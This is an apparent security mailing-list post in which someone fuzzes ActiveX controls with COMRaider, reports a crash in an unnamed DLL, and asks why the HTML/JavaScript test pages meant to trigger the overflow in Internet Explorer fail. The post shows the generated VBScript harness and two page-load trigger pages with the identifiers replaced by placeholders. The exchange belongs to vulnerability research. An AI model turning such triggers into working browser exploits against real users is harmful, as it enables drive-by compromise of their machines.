Activex potential BOF

[me <deros68 () yahoo com>]

All,

I was running the COMRAIDER package on one of my not
so secure - (but you must use the company supplied
PCs) and found several BOF in Activex (no surprise). 
However, I am puzzled and want to learn more about why
I cannot get the BOF to trigger via simple HTML/JS
file when viewed by IE

The XML generated by COMRAIDER is shown below (first
code snippet)

-------------------XML generated by COMRAIDER
-------------
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false'
error='true'>
<object
classid='clsid:999999999999999999999999999999999999'
id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 -
http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Common
Files\9999999999999999999999999999999999999999999.dll"
prototype  = "Function aaaaaaaaaaaaaaaaaaaa ( ByVal
hinstResource As Long ) As Long"
memberName = "zzzzzzzzzzzzzzzzzzzz"
progid     =
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
argCount   = 1

arg1=2147483647

target.zzzzzzzzzzzzzzzzzzzz arg1 

</script></job></package>
----------------------------------------------

Using the above value & -1 an exception is generated
in the DLL shown above.  EIP is not overlaid but l
will run Olly and see if I can get control.  - later

I checked if the AX control is allowed in our IE by
doing the following:  point IE at the HTML file below
The file resides in a trusted ZONE site.

----------------------yesorno.html---------------------

<body>
<object
classid="clsid:999999999999999999999999999999999999"
id="test"></object>
</body>

---------------------------------------------------

My IE page did not display the "test" variable and it
did not display any error messages.  I can also view
(in iE) the complete source of the HTML file. I am
assuming that this means that I can load this control
in IE ??  

COMRAIDER does FIND this control when I run it looking
for IE loadable ax - and - the KILLBIT is NOT set.

Ok - I then created several variants in JS and pointed
my IE browser at them  - each one got a
"Error on page" and nothing else.   There are 2 ways I
tried to get the BOF to occur a "spawn" command and a
"check" command in JS.

I think that I am missing the correct way to pass the
parameter to the Activex control as a "BSTR"
I also used " for the ' below and tried removing
various whitespace.  Maybe I need to define the
arguments as a number value ?

Anyone see my dumb mistake ?

------------- test1.html ----------------------
html>
<head>  This is a test - 
<script language="JavaScript">

var arg1 = '-1';

function spawn2()
{
        o2obj.zzzzzzzzzzzzzzzzzzzz(arg1);
}

</script>
</head>

<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
  
classid="clsid:999999999999999999999999999999999999"

</object>
</body>
</html>
--------------------------------------------------

-------------Test2.html-------------------------
<html>
 <head>   This is a test - 
  <script language="JavaScript" DEFER>
    function Check() {
     var x = '2147483647' ;
     
     var obj = new
ActiveXObject("999999999999999999999999999999999999");
    

     obj.zzzzzzzzzzzzzzzzzzzz(x);
    }
  </script>

 </head>  
 <body onload="JavaScript: return Check();" />
</html>
-----------------------------------------------



      ____________________________________________________________________________________
Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.  http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ 


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------